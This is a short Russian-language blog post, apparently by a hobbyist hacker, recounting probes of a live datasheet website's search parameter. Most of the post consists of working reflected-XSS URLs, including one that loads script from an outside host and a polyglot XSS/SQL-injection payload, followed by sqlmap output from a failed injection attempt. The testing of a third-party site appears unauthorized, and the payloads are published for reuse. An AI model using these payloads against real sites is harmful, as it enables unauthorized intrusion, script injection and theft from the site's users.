XSS to SQLinj? Rly?

Приветульки,

Крч, в DC7499 было обсуждение SS7 и где найти инфо по этой теме. Да, чтобы вы не спрашивали потом лишнего, то скажу что все собирают тут: https://github.com/0x90/ss7-arsenal, за что огромное спасибо!
Ну да ладно, не об этом хотел написать.

Крч, кинули ссылку на http://alldatasheet.net, куда я и заглянул 🙂

  1. 2 поля поиска. Одно нормальное, а вот второе не очень

    http://category.alldatasheet.net/index.jsp?Searchword=123lol”–!><Svg/Onload=confirm`d34dr00t`>”
  2. Не очень хорошо, а давайте еще попробуем? Может свой JS загрузим?
    Ой, бля.

    http://category.alldatasheet.net/index.jsp?Searchword=123lol”–!><“–>’><script/src=//ananev.me/xss.js>”
  3. Кажется самое время расчехлять SQLmap?))Ну бля 🙁
    [19:17:40] [WARNING] GET parameter ‘Searchword’ does not seem to be injectable
    [19:17:40] [CRITICAL] all tested parameters appear to be not injectable. Try to increase ‘–level’/’–risk’ values to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. Please, consider usage of tampering scripts as your target might filter the queries. Also, you can try to rerun by providing either a valid value for option ‘–string’ (or ‘–regexp’). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option ‘–tamper’ (e.g. ‘–tamper=space2comment’)

Волшебное превращение XSS в SQLinj не прокатило, но может так и надо(это же хорошо), но, кстати, этому XSS вектору были подверженны все их домены:

Ладно, да, получилось их, так сказать скрестить xD

http://category.alldatasheet.net/index.jsp?Searchword=123lol%3C!%27/*!%22/*!//%27/*//%22/*–!%3E%3CInput/Autofocus/*/Onfocus=confirm`d34dr00t`//%3E%3CSvg%3E